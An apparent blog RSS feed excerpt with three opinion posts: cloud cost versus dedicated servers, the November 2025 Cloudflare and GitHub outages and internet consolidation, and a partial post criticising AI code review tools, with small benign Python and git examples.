Cloud infrastructure is convenient. It's also absurdly expensive once you ...]]></description><link>https://blog.jacobalcock.co.uk/cloud-costs-are-destroying-startup-margins</link><guid isPermaLink="true">https://blog.jacobalcock.co.uk/cloud-costs-are-destroying-startup-margins</guid><category><![CDATA[Cloud Computing]]></category><category><![CDATA[Cloud]]></category><category><![CDATA[cost-optimisation]]></category><category><![CDATA[software development]]></category><dc:creator><![CDATA[Jacob Alcock]]></dc:creator><pubDate>Sat, 29 Nov 2025 13:02:03 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/stock/unsplash/9BJRGlqoIUk/upload/fe62a87a184c92a637d7a81be59d1d78.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>AWS bills that exceed engineering salaries are normal now. Startups with 100,000 users paying $50,000/month for infrastructure that could run on a $200/month dedicated server.</p>
<p>Cloud infrastructure is convenient. It's also absurdly expensive once you move beyond toy projects. And the costs compound in ways that aren't obvious until you're locked in.</p>
<h1 id="heading-the-real-cost-comparison">The Real Cost Comparison</h1>
<p><strong>Scenario</strong>: A typical SaaS startup with 100k users, ~500GB database, moderate traffic</p>
<p><strong>AWS</strong>:</p>
<ul>
<li><p>RDS (db.r5.xlarge): $500/month</p>
</li>
<li><p>EC2 instances (3x m5.large for redundancy): $450/month</p>
</li>
<li><p>Load balancer: $25/month</p>
</li>
<li><p>Data transfer out: $500-2,000/month (depending on traffic)</p>
</li>
<li><p>S3 storage and requests: $200/month</p>
</li>
<li><p>CloudFront: $100/month</p>
</li>
<li><p>Backups, snapshots, logs: $150/month</p>
</li>
<li><p>Monitoring, alerts: $50/month</p>
</li>
</ul>
<p><strong>Monthly total</strong>: $2,000-3,500/month</p>
<p><strong>Hetzner dedicated server</strong> (AX102):</p>
<ul>
<li><p>CPU: AMD Ryzen 9 7950X (16 cores)</p>
</li>
<li><p>RAM: 128GB</p>
</li>
<li><p>Storage: 2x 3.84TB NVMe SSD</p>
</li>
<li><p>Bandwidth: Unlimited at 1Gbit/s</p>
</li>
</ul>
<p><strong>Monthly total</strong>: €200 (~$220/month)</p>
<p>The AWS bill is <strong>10-15x higher</strong> for comparable resources. And that's before costs balloon with scale.</p>
<h1 id="heading-hidden-costs">Hidden Costs</h1>
<p>Cloud vendors bury costs in fees most startups don't anticipate.</p>
<p><strong>Data transfer (egress) fees</strong></p>
<p>AWS charges $0.09/GB for data transfer out. Seems small until you do the math:</p>
<ul>
<li><p>100k daily active users</p>
</li>
<li><p>Average 5MB per session</p>
</li>
<li><p>500GB/day = 15TB/month</p>
</li>
<li><p>15TB × $0.09 = <strong>$1,350/month just for bandwidth</strong></p>
</li>
</ul>
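<p>The arithmetic above can be sketched as a back-of-envelope calculator; the traffic figures are this article's example numbers, not measured benchmarks:</p>
<pre><code class="lang-python"># Back-of-envelope AWS egress cost, using the example traffic above.
AWS_EGRESS_PER_GB = 0.09  # USD per GB out to the internet (first tiers)

daily_active_users = 100_000
mb_per_session = 5
days_per_month = 30

gb_per_day = daily_active_users * mb_per_session / 1_000   # 500 GB/day
gb_per_month = gb_per_day * days_per_month                 # 15 TB/month
monthly_egress_cost = gb_per_month * AWS_EGRESS_PER_GB

print(f"{gb_per_month:,.0f} GB/month -> ${monthly_egress_cost:,.0f}/month")
</code></pre>
<p>Swap in your own analytics numbers before trusting any pricing comparison.</p>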
<p>Hetzner: Included. No egress fees.</p>
<p><strong>Cross-region transfer</strong></p>
<p>Moving data between AWS regions costs $0.02/GB. If your database is in us-east-1 and your app servers are in us-west-2, every query costs money.</p>
<p><strong>NAT Gateway</strong></p>
<p>Need private subnets to access the internet? $0.045/GB processed + $0.045/hour. Easily $50-100/month for basic usage.</p>
<p><strong>Load balancer fees</strong></p>
<p>Application Load Balancer: $0.0225/hour + $0.008/LCU. Minimum ~$16/month, realistically $25-50/month.</p>
<p><strong>Reserved instances trap</strong></p>
<p>"Save 30-60% by committing to reserved instances!"</p>
<p>You commit to 1-3 year contracts. Your usage patterns change. You're stuck paying for resources you don't need while also paying for the resources you actually use.</p>
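<p>The trap is easier to see with numbers. A minimal sketch of the break-even point, assuming an illustrative 40% reserved-instance discount (actual discounts vary by instance type, term, and payment option):</p>
<pre><code class="lang-python"># Break-even utilisation for a reserved instance vs on-demand, assuming
# an illustrative 40% RI discount. Rates are examples, not quotes.
on_demand_hourly = 0.096                        # approx. m5.large rate
ri_effective_hourly = on_demand_hourly * 0.60   # billed 24/7, used or not

# Running on-demand a fraction u of the time costs u * on_demand_hourly
# per hour on average; the RI costs its full rate regardless of usage.
break_even_utilisation = ri_effective_hourly / on_demand_hourly
print(f"RI wins only above {break_even_utilisation:.0%} utilisation")
</code></pre>
<p>If your usage might drop below that line inside the commitment window, the "savings" become a liability.</p>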
<p><strong>Support fees</strong></p>
<ul>
<li><p>Basic: free (but useless, with 24-hour response times for production issues)</p>
</li>
<li><p>Developer: $29/month minimum, or 3% of the AWS bill</p>
</li>
<li><p>Business: $100/month minimum, or 10% of the AWS bill (the cheapest tier with 1-hour response)</p>
</li>
</ul>
<p>If your monthly bill is $10,000, business support costs $1,000/month on top of that.</p>
<h1 id="heading-compounding-cost">Compounding Cost</h1>
<p>Cloud costs don't scale linearly. They compound.</p>
<p><strong>Example progression</strong>:</p>
<ul>
<li><p><strong>Months 1-6 (MVP)</strong>: $200/month - single small instance, small database</p>
</li>
<li><p><strong>Months 7-12 (early traction)</strong>: $800/month - added load balancer, bigger database, redundancy</p>
</li>
<li><p><strong>Months 13-18 (growing)</strong>: $3,500/month - multi-region, CDN, caching layer, monitoring</p>
</li>
<li><p><strong>Months 19-24 (scaling)</strong>: $15,000/month - auto-scaling, managed services, increased traffic</p>
</li>
<li><p><strong>Months 25+ (mature)</strong>: $50,000+/month - everything costs more at scale</p>
</li>
</ul>
<p>Revenue might grow 10x. Infrastructure costs grow 250x.</p>
<h1 id="heading-why-startups-use-cloud-anyway">Why Startups Use Cloud Anyway</h1>
<p>If cloud is so expensive, why does everyone use it?</p>
<p><strong>Speed to market</strong></p>
<p>Provisioning a server takes minutes on AWS. Buying hardware takes weeks. Early-stage startups optimize for speed, not cost.</p>
<p><strong>No upfront capital</strong></p>
<p>Buying servers requires cash. AWS is OpEx, not CapEx. Startups short on cash choose monthly bills over hardware purchases.</p>
<p><strong>Scaling flexibility</strong></p>
<p>Need 10x capacity for a product launch? Spin up instances. Traffic drops after? Scale down. With owned hardware, you're stuck with excess capacity.</p>
<p><strong>Managed services</strong></p>
<p>RDS handles database backups and failover. S3 handles file storage. Lambda handles compute. No DevOps engineer needed (initially).</p>
<p><strong>Investor expectations</strong></p>
<p>VCs expect startups to use cloud infrastructure. Saying "we run on bare metal" raises questions about scalability.</p>
<p><strong>Developer preference</strong></p>
<p>Engineers want AWS/GCP/Azure on their resume. Managing physical servers feels outdated.</p>
<h1 id="heading-when-cloud-costs-break-startups">When Cloud Costs Break Startups</h1>
<p>The breaking point comes when infrastructure costs exceed engineering salaries.</p>
<p><strong>Real example</strong> (anonymised):</p>
<p>SaaS company, $2M ARR, 15 employees</p>
<ul>
<li><p>Engineering team (5 people): $750k/year</p>
</li>
<li><p>AWS bill: $960k/year</p>
</li>
</ul>
<p>Infrastructure costs more than the team building the product.</p>
<ul>
<li><p>Gross margin: 52% (should be 80%+ for SaaS)</p>
</li>
<li><p>Path to profitability: unclear, because AWS costs grow faster than revenue</p>
</li>
</ul>
<h1 id="heading-the-margin-destruction">The Margin Destruction</h1>
<p>Typical SaaS metrics:</p>
<ul>
<li><p>Target gross margin: 80%+</p>
</li>
<li><p>Customer acquisition cost: $500-2,000</p>
</li>
<li><p>Lifetime value: $5,000-20,000</p>
</li>
</ul>
<p>When cloud costs consume 40-50% of revenue:</p>
<ul>
<li><p>Gross margin: 50-60%</p>
</li>
<li><p>Less capital for growth</p>
</li>
<li><p>Longer path to profitability</p>
</li>
<li><p>Less attractive to investors/acquirers</p>
</li>
</ul>
<p>Cloud vendors effectively tax your revenue at 30-50%. And the tax rate increases with scale.</p>
<h1 id="heading-repatriation">Repatriation</h1>
<p>Companies are moving off cloud to save money.</p>
<p><strong>37signals (Basecamp, Hey)</strong>:</p>
<p>Moved off cloud, saved $7 million over 5 years. Bought hardware, colocated in data centers. Margins improved dramatically.</p>
<p><strong>Dropbox</strong>:</p>
<p>Moved storage off AWS to owned infrastructure. Saved $75 million over 2 years.</p>
<p><strong>Discord</strong>:</p>
<p>Moved from MongoDB Atlas to ScyllaDB on owned hardware. Saved millions annually while improving performance.</p>
<p>The pattern repeats: companies hit scale, realise cloud costs are destroying their margins, and migrate to owned infrastructure.</p>
<h1 id="heading-migration">Migration</h1>
<p>"Just move off cloud" sounds simple. It's not.</p>
<p><strong>Vendor lock-in</strong></p>
<p>Built with AWS Lambda, API Gateway, DynamoDB, and SQS? That's AWS-specific. Migration requires rewriting.</p>
<p><strong>Operational complexity</strong></p>
<p>Moving to owned infrastructure means:</p>
<ul>
<li><p>Managing hardware failures</p>
</li>
<li><p>Handling network issues</p>
</li>
<li><p>Maintaining security</p>
</li>
<li><p>Scaling manually</p>
</li>
<li><p>Hiring DevOps/SRE team</p>
</li>
</ul>
<p><strong>Upfront costs</strong></p>
<p>Buying servers and colocation contracts requires capital. Startups operating on VC runway don't have it.</p>
<p><strong>Risk</strong></p>
<p>Cloud providers have SLAs. Owned infrastructure means you're responsible for uptime. One mistake costs customers.</p>
<p><strong>Time</strong></p>
<p>Migration takes months. Engineering time spent migrating isn't spent building features. Opportunity cost is massive.</p>
<h1 id="heading-what-i-do">What I Do</h1>
<p>For early-stage projects: I use cloud. Speed matters.</p>
<p>For projects with revenue: I run numbers monthly. When cloud costs hit 15-20% of revenue, I start planning migration.</p>
<p>For established projects: Hybrid approach. Owned infrastructure for predictable workloads, cloud for spikes and backups.</p>
<p>I don't pay AWS for bandwidth that's free elsewhere. I don't pay for managed services I can run myself. I don't commit to reserved instances.</p>
<h1 id="heading-final-thoughts">Final Thoughts</h1>
<p>Cloud infrastructure is a tool. It's not a requirement.</p>
<p>Early on, cloud makes sense: fast provisioning, no upfront costs, managed services. The cost is worth the speed.</p>
<p>At scale, cloud is a tax on your revenue. Companies with mature products running on AWS are often paying 10-15x what the same infrastructure costs elsewhere.</p>
<p>The migration path exists. It's just painful, which is exactly why cloud vendors designed it that way.</p>
<p>If your AWS bill exceeds your engineering salaries, you have a problem. If your gross margins are below 70% because of infrastructure costs, you're building a less profitable business than necessary.</p>
<p>Cloud vendors have successfully convinced the industry that expensive infrastructure is inevitable. It's not. It's a choice.</p>
<p>Choose deliberately.</p>
]]></content:encoded></item><item><title><![CDATA[When Cloudflare and GitHub Go Down on the Same Day: The Internet's Fragile Foundation]]></title><description><![CDATA[November 18, 2025: Cloudflare goes down at 7am ET. X, ChatGPT, Spotify, Zoom, and thousands of other sites become unreachable. 20% of the internet stops working.
Four hours later, Cloudflare comes back up.
Then GitHub goes down. Git operations fail g...]]></description><link>https://blog.jacobalcock.co.uk/when-cloudflare-and-github-go-down-on-the-same-day-the-internets-fragile-foundation</link><guid isPermaLink="true">https://blog.jacobalcock.co.uk/when-cloudflare-and-github-go-down-on-the-same-day-the-internets-fragile-foundation</guid><category><![CDATA[Outage]]></category><category><![CDATA[cloudflare]]></category><category><![CDATA[GitHub]]></category><category><![CDATA[Developer]]></category><dc:creator><![CDATA[Jacob Alcock]]></dc:creator><pubDate>Thu, 20 Nov 2025 22:02:07 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1763638186827/8956b1ba-7567-461d-bba2-19f5e581366d.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>November 18, 2025: Cloudflare goes down at 7am ET. X, ChatGPT, Spotify, Zoom, and thousands of other sites become unreachable. 20% of the internet stops working.</p>
<p>Four hours later, Cloudflare comes back up.</p>
<p>Then GitHub goes down. Git operations fail globally. Developers can't push code. CI/CD pipelines break. Deployments stop.</p>
<p>Two critical internet infrastructure providers failing on the same day. Millions of users affected. Billions in productivity lost.</p>
<p>This isn't a coincidence. It's the inevitable result of an internet built on a handful of single points of failure.</p>
<h1 id="heading-what-happened-cloudflare"><strong>What Happened: Cloudflare</strong></h1>
<p><strong>The Outage</strong>:</p>
<ul>
<li><p>Started: ~11:30 GMT / 7:00 AM ET</p>
</li>
<li><p>Resolved: 14:30 UTC (~4 hour duration)</p>
</li>
<li><p>Cause: Auto-generated configuration file grew beyond expected size, crashed threat management system</p>
</li>
<li><p>Impact: Sites returning 500 errors, timeouts, Cloudflare error pages</p>
</li>
</ul>
<p><strong>Sites Affected</strong>:</p>
<ul>
<li><p>X (Twitter)</p>
</li>
<li><p>ChatGPT</p>
</li>
<li><p>Claude</p>
</li>
<li><p>Spotify</p>
</li>
<li><p>Zoom</p>
</li>
<li><p>Canva</p>
</li>
<li><p>Amazon (some services)</p>
</li>
<li><p>Thousands more</p>
</li>
</ul>
<p>Even Downdetector - the site people visit to check if other sites are down - went down.</p>
<p><strong>Root Cause</strong>:</p>
<p>Cloudflare CTO Dane Knecht explained the failure:</p>
<blockquote>
<p>"The root cause of the outage was a configuration file that is automatically generated to manage threat traffic. The file grew beyond an expected size of entries and triggered a crash in the software system that handles traffic for a number of Cloudflare's services. The Cloudflare team was able to diagnose the issue and revert to a previous version of the file which restored services as of 14:30 UTC. There is no evidence of an attack or malicious activity causing the issue."</p>
</blockquote>
<p>Translation: An auto-generated config file for threat management grew too large. The software couldn't handle it. It crashed. That crash cascaded through Cloudflare's network. Everything broke.</p>
<p>Not an attack. Not malicious. Just a config file that grew beyond expected size and took down 20% of the internet.</p>
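<p>Cloudflare hasn't published the code involved, but the failure mode points at a general defence: validate auto-generated inputs against the consuming system's limits and fall back to a known-good version instead of crashing. A minimal sketch, with every name and limit hypothetical:</p>
<pre><code class="lang-python"># Hypothetical defensive loader for an auto-generated config file:
# reject oversized input and keep serving the last-known-good copy.
import json

MAX_ENTRIES = 10_000  # assumed capacity of whatever consumes the file

def load_threat_config(path, last_known_good_path):
    with open(path) as f:
        entries = json.load(f)
    if len(entries) > MAX_ENTRIES:
        # Fall back instead of crashing: serve the previous good version.
        with open(last_known_good_path) as f:
            entries = json.load(f)
    return entries
</code></pre>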
<h1 id="heading-what-happened-github"><strong>What Happened: GitHub</strong></h1>
<p><strong>Hours later, same day</strong>:</p>
<p>GitHub Status: "Git Operations is experiencing degraded availability."</p>
<p>Users seeing:</p>
<pre><code class="lang-plaintext">fatal: Could not read from remote repository.
Please make sure you have the correct access rights
and the repository exists.
</code></pre>
<p><strong>Impact</strong>:</p>
<ul>
<li><p>Can't clone repos</p>
</li>
<li><p>Can't push code</p>
</li>
<li><p>Can't pull updates</p>
</li>
<li><p>CI/CD pipelines blocked</p>
</li>
<li><p>Deployments stopped</p>
</li>
</ul>
<p>Multiple accounts, multiple orgs, multiple repos. Global impact.</p>
<p>Two critical infrastructure providers. Same day. Unrelated failures.</p>
<h1 id="heading-the-single-point-of-failure"><strong>The Single Point of Failure</strong></h1>
<p><strong>Cloudflare powers 20% of all websites</strong></p>
<p>Think about that. One company. One fifth of the internet.</p>
<p>When Cloudflare crashes, 20% of the web becomes unreachable. Not because those sites crashed. Because the infrastructure protecting and routing to those sites crashed.</p>
<p><strong>GitHub hosts the majority of open source and enterprise code</strong></p>
<p>Most companies use GitHub for source control. When GitHub goes down:</p>
<ul>
<li><p>Developers can't work</p>
</li>
<li><p>Deployments stop</p>
</li>
<li><p>CI/CD breaks</p>
</li>
<li><p>Open source grinds to a halt</p>
</li>
</ul>
<p><strong>The consolidation problem</strong>:</p>
<p>The internet runs on a handful of companies:</p>
<ul>
<li><p>Cloudflare (CDN, DDoS protection, DNS)</p>
</li>
<li><p>AWS (cloud infrastructure)</p>
</li>
<li><p>Microsoft Azure (cloud infrastructure)</p>
</li>
<li><p>Google Cloud (cloud infrastructure)</p>
</li>
<li><p>GitHub (source control)</p>
</li>
<li><p>Fastly (CDN)</p>
</li>
</ul>
<p>When any of these have problems, significant chunks of the internet break.</p>
<h1 id="heading-why-this-keeps-happening"><strong>Why This Keeps Happening</strong></h1>
<p><strong>Within one month alone</strong>:</p>
<ul>
<li><p>AWS outage (October 20)</p>
</li>
<li><p>Microsoft Azure outage (days after AWS)</p>
</li>
<li><p>Cloudflare outage (November 18)</p>
</li>
<li><p>GitHub outage (November 18, same day as Cloudflare)</p>
</li>
</ul>
<p>Four major infrastructure providers. Four outages. One month.</p>
<p>Professor David Choffnes (Northeastern University):</p>
<blockquote>
<p>"We now have AWS, Azure and Cloudflare outages in the span of a month. That's a very large portion of the biggest cloud providers in the world. It has not been the case that we have seen major outages like this in a short period of time."</p>
</blockquote>
<p>This isn't normal. But it's becoming normalised.</p>
<h1 id="heading-why-companies-rely-on-these-services"><strong>Why Companies Rely on These Services</strong></h1>
<p><strong>Cost</strong></p>
<p>Building your own CDN: Millions in infrastructure, operations, staff.</p>
<p>Using Cloudflare: Free tier or $20-200/month.</p>
<p>Building your own Git infrastructure: Servers, backups, reliability engineering.</p>
<p>Using GitHub: $0-$21/user/month.</p>
<p>The economics are obvious.</p>
<p><strong>Expertise</strong></p>
<p>Cloudflare has 330 data centers globally. 13,000 networks directly connected.</p>
<p>Most companies can't build that. Even if they could, it would cost more than using Cloudflare.</p>
<p><strong>DDoS protection</strong></p>
<p>Cloudflare's primary value: protecting sites from DDoS attacks.</p>
<p>DDoS attacks can cost millions in downtime. Cloudflare prevents them for $20/month.</p>
<p>But when Cloudflare goes down, sites become unreachable anyway. The irony is thick.</p>
<p><strong>Network effects</strong></p>
<p>GitHub has the code. Developers use GitHub. Companies hire developers who know GitHub. Everyone uses GitHub.</p>
<p>Switching to GitLab, Bitbucket, or self-hosted Git means retraining, migration cost, and losing ecosystem integrations.</p>
<p>Lock-in is real.</p>
<h1 id="heading-the-latent-bug-problem"><strong>The Latent Bug Problem</strong></h1>
<p>Cloudflare's outage was caused by a "latent bug" - a bug that existed in production but wasn't detected until a specific condition triggered it.</p>
<p><strong>How this happens</strong>:</p>
<ol>
<li><p>Code has bug</p>
</li>
<li><p>Bug doesn't manifest under normal conditions</p>
</li>
<li><p>Bug passes testing</p>
</li>
<li><p>Bug ships to production</p>
</li>
<li><p>Months/years pass</p>
</li>
<li><p>Configuration change or traffic pattern triggers bug</p>
</li>
<li><p>Service crashes</p>
</li>
<li><p>Cascading failure takes down everything</p>
</li>
</ol>
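<p>A toy illustration of how such a bug hides (entirely contrived): the code below behaves for every input seen in testing, then crashes the first time a generated input outgrows a hard-coded assumption.</p>
<pre><code class="lang-python"># Contrived latent bug: a fixed-capacity table sized to an assumption
# that held at ship time ("the file never has more than 1,000 entries").
CAPACITY = 1_000

def index_entries(entries):
    table = [None] * CAPACITY
    for i, entry in enumerate(entries):
        table[i] = entry   # IndexError once the input exceeds CAPACITY
    return table

index_entries(range(500))        # fine, for months or years
try:
    index_entries(range(2_000))  # the day the file grows: crash
except IndexError:
    print("crash: input outgrew the hard-coded assumption")
</code></pre>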
<p><strong>Why testing doesn't catch it</strong>:</p>
<p>Testing simulates normal conditions. Latent bugs manifest under abnormal conditions - edge cases, specific configurations, unusual traffic patterns.</p>
<p>You can't test for every possible scenario. Some bugs hide until production triggers them.</p>
<p><strong>The cascade problem</strong>:</p>
<p>Bug in bot mitigation service crashed that service. That service is critical to other services. Those services crashed. Those services were critical to more services. Cascade.</p>
<p>Modern distributed systems have interdependencies. One failure propagates everywhere.</p>
<h1 id="heading-the-apology"><strong>The Apology</strong></h1>
<p>Cloudflare CTO Dane Knecht posted on LinkedIn:</p>
<blockquote>
<p>"I won't mince words: earlier today we failed our customers and the broader Internet when a problem in Cloudflare's network impacted large amounts of traffic that rely on us. The sites, businesses, and organizations that rely on Cloudflare depend on us being available and I apologize for the impact that we caused... That issue, impact it caused, and time to resolution is unacceptable. Work is already underway to make sure it does not happen again, but I know it caused real pain today. The trust our customers place in us is what we value the most and we are going to do what it takes to earn that back."</p>
</blockquote>
<p>Cloudflare's formal statement:</p>
<blockquote>
<p>"We apologise to our customers and the Internet in general for letting you down today. Given the importance of Cloudflare's services, any outage is unacceptable."</p>
</blockquote>
<p>Cloudflare's importance makes outages unacceptable. But outages will happen anyway. The apology is sincere. It also doesn't prevent the next outage.</p>
<h1 id="heading-why-this-wont-get-fixed"><strong>Why This Won't Get Fixed</strong></h1>
<p><strong>No alternative exists</strong></p>
<p>You can't avoid Cloudflare by using... what? Build your own global CDN?</p>
<p>For most companies, that's not realistic.</p>
<p><strong>Diversification is expensive</strong></p>
<p>Using multiple CDN providers means:</p>
<ul>
<li><p>Double the cost</p>
</li>
<li><p>Complex failover logic</p>
</li>
<li><p>More things to manage</p>
</li>
<li><p>Still vulnerable if primary provider fails and failover is slow</p>
</li>
</ul>
<p><strong>The market rewards consolidation</strong></p>
<p>Cloudflare wins because they're the biggest, cheapest, most feature-rich option.</p>
<p>Smaller competitors can't match their scale or price.</p>
<p>Market concentration increases. Single point of failure risk increases.</p>
<p><strong>Regulatory inaction</strong></p>
<p>Governments could regulate critical internet infrastructure. Require redundancy, disaster recovery, testing standards.</p>
<p>They don't. Cloudflare is a private company. Regulators don't care until something catastrophic happens.</p>
<p><strong>Cost of downtime vs cost of prevention</strong></p>
<p>Cloudflare's 4-hour outage cost the internet billions.</p>
<p>But Cloudflare's cost was minimal:</p>
<ul>
<li><p>No SLA violations for most customers (free tier has no SLA)</p>
</li>
<li><p>Stock down 3%, recovered quickly</p>
</li>
<li><p>No regulatory penalty</p>
</li>
<li><p>No lawsuits with teeth</p>
</li>
</ul>
<h1 id="heading-the-github-timing"><strong>The GitHub Timing</strong></h1>
<p>GitHub going down the same day as Cloudflare is probably coincidence.</p>
<p>But it illustrates the problem: we have no redundancy.</p>
<p>When GitHub is down, there's no "backup GitHub." You just wait.</p>
<p>When Cloudflare is down, there's no failover. Sites just show errors.</p>
<p><strong>Why no backup</strong>:</p>
<p>Maintaining GitHub failover means:</p>
<ul>
<li><p>Mirroring all repos to another provider</p>
</li>
<li><p>Keeping mirrors in sync</p>
</li>
<li><p>Switching workflows when GitHub is down</p>
</li>
<li><p>Training developers on two systems</p>
</li>
</ul>
<p>Cost and complexity aren't worth it for most companies. So they accept the risk.</p>
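<p>For teams that do want a warm standby, the mirroring itself is cheap; it's the process around it that costs. A sketch using a local bare repository as a stand-in for a second provider (all paths and names illustrative):</p>
<pre><code class="lang-shell"># Stand-in for a second provider: a bare repo. In practice this would
# be a GitLab/Bitbucket URL or a self-hosted box.
git init --bare /tmp/backup.git

# A throwaway repo playing the part of the GitHub working copy.
git init /tmp/demo
cd /tmp/demo
git -c user.email=ci@example.com -c user.name=ci \
    commit --allow-empty -m "init"

# Register the backup and mirror everything: branches, tags, all refs.
# Running this from CI on every merge keeps the mirror warm.
git remote add backup /tmp/backup.git
git push --mirror backup
</code></pre>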
<h1 id="heading-the-awsazurecloudflare-trifecta"><strong>The AWS/Azure/Cloudflare Trifecta</strong></h1>
<p>In one month:</p>
<ul>
<li><p>AWS outage knocked out 1,000+ sites</p>
</li>
<li><p>Azure outage followed days later</p>
</li>
<li><p>Cloudflare outage took down 20% of the internet</p>
</li>
</ul>
<p>Professor Timothy Edgar (Brown University):</p>
<blockquote>
<p>"This is another alarming example of how dependent we have become on critical internet infrastructure, and how little the government is doing to hold big companies accountable."</p>
</blockquote>
<p><strong>The consolidation timeline</strong>:</p>
<ul>
<li><p><strong>2010</strong>: many CDN providers, diverse cloud infrastructure</p>
</li>
<li><p><strong>2015</strong>: market consolidating around AWS, Cloudflare, Azure</p>
</li>
<li><p><strong>2020</strong>: three companies dominate cloud infrastructure</p>
</li>
<li><p><strong>2025</strong>: the internet runs on a handful of companies; outages affect billions</p>
</li>
</ul>
<p>Consolidation was economically rational for companies. Disastrous for internet resilience.</p>
<h1 id="heading-the-irony"><strong>The Irony</strong></h1>
<p>Cloudflare's primary product: DDoS protection. Keeping sites online during attacks.</p>
<p>Cloudflare's outage: Made sites unreachable. Same result as DDoS.</p>
<p>The tool meant to prevent downtime caused downtime.</p>
<p><strong>From Alp Toker (NetBlocks)</strong>:</p>
<blockquote>
<p>"What's striking is how much of the internet has had to hide behind Cloudflare infrastructure to avoid denial of service attacks in recent years. [It] has become one of the internet's largest single points of failure."</p>
</blockquote>
<p>We built internet infrastructure to prevent attacks from taking down sites.</p>
<p>Instead we created infrastructure that can take down sites without any attack.</p>
<h1 id="heading-the-truth"><strong>The Truth</strong></h1>
<p>The internet is fragile because it's consolidated.</p>
<p>20% of websites depend on one company. Most code is hosted by one company. Most cloud infrastructure is split between three companies.</p>
<p>When any of these fail, significant chunks of the internet stop working.</p>
<p>This happens because:</p>
<ul>
<li><p>Consolidation is economically efficient</p>
</li>
<li><p>Building alternatives is expensive</p>
</li>
<li><p>Network effects create lock-in</p>
</li>
<li><p>Regulation doesn't require resilience</p>
</li>
</ul>
<p>November 18, 2025 had two major outages. Same day. Unrelated causes. Both critical infrastructure.</p>
<p>This will happen again. More frequently. Because the internet's foundation is built on single points of failure, and nobody with the power to fix it has an incentive to do so.</p>
<p><strong>What we're told</strong>: "Incidents are unacceptable. We're working to prevent them."</p>
<p><strong>What will happen</strong>: More incidents. More apologies. No structural change.</p>
<p>The internet runs on a handful of companies. When they fail, the internet fails.</p>
<p>We've optimized for cost and convenience. We've sacrificed resilience.</p>
<p>November 18 was a reminder of that trade-off.</p>
<p>The next reminder is coming. We just don't know when.</p>
<hr />
<p><strong>Timeline</strong>:</p>
<ul>
<li><p><strong>7:00 AM ET / 11:30 GMT</strong>: Cloudflare outage begins</p>
</li>
<li><p><strong>10:30 AM ET / 14:30 UTC</strong>: Cloudflare services restored</p>
</li>
<li><p><strong>3:39 PM ET</strong>: GitHub Git operations begin failing</p>
</li>
<li><p><strong>Same day</strong>: Two critical infrastructure providers down, millions affected</p>
</li>
</ul>
<p>The internet's fragility has never been clearer.</p>
]]></content:encoded></item><item><title><![CDATA[AI Code Review Tools Are Making Code Worse]]></title><description><![CDATA[AI code review tools promise to catch bugs before they hit production. In practice, they're creating a false sense of security while making it easier to ship bad code.
The problem isn't that AI code review doesn't work at all. It's that it works just...]]></description><link>https://blog.jacobalcock.co.uk/ai-code-review-tools-are-making-code-worse</link><guid isPermaLink="true">https://blog.jacobalcock.co.uk/ai-code-review-tools-are-making-code-worse</guid><category><![CDATA[AI]]></category><category><![CDATA[coding]]></category><category><![CDATA[Developer]]></category><dc:creator><![CDATA[Jacob Alcock]]></dc:creator><pubDate>Fri, 14 Nov 2025 23:04:36 GMT</pubDate><content:encoded><![CDATA[<p>AI code review tools promise to catch bugs before they hit production. In practice, they're creating a false sense of security while making it easier to ship bad code.</p>
<p>The problem isn't that AI code review doesn't work at all. It's that it works just well enough to be dangerous.</p>
<h1 id="heading-false-security">False Security</h1>
<p>When you have an AI tool that flags 20 issues in a PR, and 18 of them are noise, developers learn to ignore them. The two real issues get lost in the noise. This is worse than no automated review at all.</p>
<p>Traditional code review works because there's accountability. A human reviewer stakes their reputation on approving code. They know if they approve something that breaks production, it reflects on them. AI tools have no such incentive.</p>
<p>The result: developers treat AI code review as a checkbox. "The bot approved it" becomes justification for merging without actual human review.</p>
<h1 id="heading-what-ai-code-review-actually-catches">What AI Code Review Actually Catches</h1>
<ul>
<li><p><strong>Linting issues</strong> - things your IDE already flagged</p>
</li>
<li><p><strong>Style violations</strong> - whitespace, formatting, naming conventions</p>
</li>
<li><p><strong>Simple pattern matching</strong> - detecting banned functions or obvious anti-patterns</p>
</li>
<li><p><strong>Surface-level type errors</strong> - things TypeScript/mypy would catch anyway</p>
</li>
</ul>
<p>What it doesn't catch:</p>
<ul>
<li><p><strong>Logic errors</strong> - off-by-one errors, incorrect conditionals, race conditions</p>
</li>
<li><p><strong>Security vulnerabilities</strong> - SQL injection, XSS, authentication bypasses (unless they match exact training patterns)</p>
</li>
<li><p><strong>Architecture issues</strong> - this function shouldn't exist, wrong abstraction, tight coupling</p>
</li>
<li><p><strong>Business logic bugs</strong> - the code does what it says, but what it says is wrong</p>
</li>
<li><p><strong>Context-dependent problems</strong> - this change breaks an assumption made elsewhere</p>
</li>
</ul>
<p>The entire value of code review comes from catching the second category. AI tools are optimised for the first.</p>
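<p>The gap is easy to demonstrate. The function below passes every linter and type checker, yet hides a logic bug that no pattern matcher flags (the example is contrived):</p>
<pre><code class="lang-python"># Lints clean, type-checks clean, and is still wrong.
def last_n(items: list, n: int) -> list:
    """Return the last n items."""
    return items[-n:]   # classic off-by-one trap

print(last_n([1, 2, 3], 2))   # [2, 3] as expected
print(last_n([1, 2, 3], 0))   # expected [], returns [1, 2, 3]: -0 is 0
</code></pre>
<p>Only a reviewer thinking about edge cases - what happens when n is zero? - catches it.</p>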
<h1 id="heading-training-data">Training Data</h1>
<p>AI code review tools are trained on existing codebases. Existing codebases are full of bugs. The model learns to accept buggy code because that's what it was trained on.</p>
<p>The model has no way to know if code it was trained on later caused production incidents. It treats "code that was merged" as "good code" when in reality it just means "code that someone approved."</p>
<p>This is the same fundamental flaw as <a target="_blank" href="https://blog.jacobalcock.co.uk/model-collapse-the-ai-feedback-loop-problem-nobody-wants-to-talk-about">LLM model collapse</a>. The training data is contaminated with the exact problems the tool is supposed to prevent.</p>
<h1 id="heading-alert-fatigue">Alert Fatigue</h1>
<p>I've seen AI code review tools flag the following as "security issues":</p>
<ul>
<li><p>Using <code>JSON.parse()</code> (flagged as potential RCE)</p>
</li>
<li><p>Any SQL query (flagged as potential injection, even with parameterised queries)</p>
</li>
<li><p><code>eval()</code> in a test file</p>
</li>
<li><p><code>setTimeout</code> with a variable delay (flagged as timing attack)</p>
</li>
</ul>
